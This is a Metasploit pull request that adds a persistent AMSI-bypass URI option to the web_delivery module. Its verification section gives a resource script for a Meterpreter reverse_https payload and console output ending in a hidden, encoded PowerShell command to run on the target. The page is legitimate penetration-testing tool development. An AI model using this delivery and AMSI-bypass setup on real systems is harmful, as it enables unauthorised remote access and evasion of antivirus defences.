
Add PSH-AmsiBypassURI option to allow persistent web_delivery #13063

Merged
merged 1 commit into from Mar 13, 2020

Conversation

@timwr

timwr commented Mar 12, 2020

This change adds a PSH-AmsiBypassURI option that allows web_delivery to be persistent between runs.
Fixes #13046

Verification

$ cat winweb.rc
use exploit/multi/script/web_delivery
set SRVHOST 192.168.56.1
set LHOST 192.168.56.1
set LPORT 4444
set target 2
set URIPATH /uri
set PSH-AmsiBypassURI /amsi_get_out_of_my_way
set SSL true
set payload windows/x64/meterpreter/reverse_https
# not sure if these are needed
set AutoLoadStdapi false
set AutoVerifySession false
set AutoSystemInfo false

exploit

$ ./msfconsole -qr winweb.rc
[*] Processing winweb.rc for ERB directives.
resource (winweb.rc)> use exploit/multi/script/web_delivery
resource (winweb.rc)> set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
resource (winweb.rc)> set LHOST 192.168.56.1
LHOST => 192.168.56.1
resource (winweb.rc)> set LPORT 4444
LPORT => 4444
resource (winweb.rc)> set target 2
target => 2
resource (winweb.rc)> set URIPATH /uri
URIPATH => /uri
resource (winweb.rc)> set PSH-AmsiBypassURI /amsi_get_out_of_my_way
PSH-AmsiBypassURI => /amsi_get_out_of_my_way
resource (winweb.rc)> set SSL true
SSL => true
resource (winweb.rc)> set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
resource (winweb.rc)> set AutoLoadStdapi false
AutoLoadStdapi => false
resource (winweb.rc)> set AutoVerifySession false
AutoVerifySession => false
resource (winweb.rc)> set AutoSystemInfo false
AutoSystemInfo => false
resource (winweb.rc)> exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/script/web_delivery) >
[*] Started HTTPS reverse handler on https://192.168.56.1:4444
[*] Using URL: https://192.168.56.1:8080/uri
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e 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

Verify:

  • The powershell command is the same each time you run the script
  • 🐛 (don't forget to meterpreter > load stdapi)
@bwatters-r7 bwatters-r7 self-assigned this Mar 13, 2020
@bwatters-r7 bwatters-r7 merged commit c21b90e into rapid7:master Mar 13, 2020
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
@bwatters-r7
bwatters-r7 commented Mar 13, 2020

Release notes

This PR fixes an issue where persistence was not well-supported by the powershell amsi bypass option.
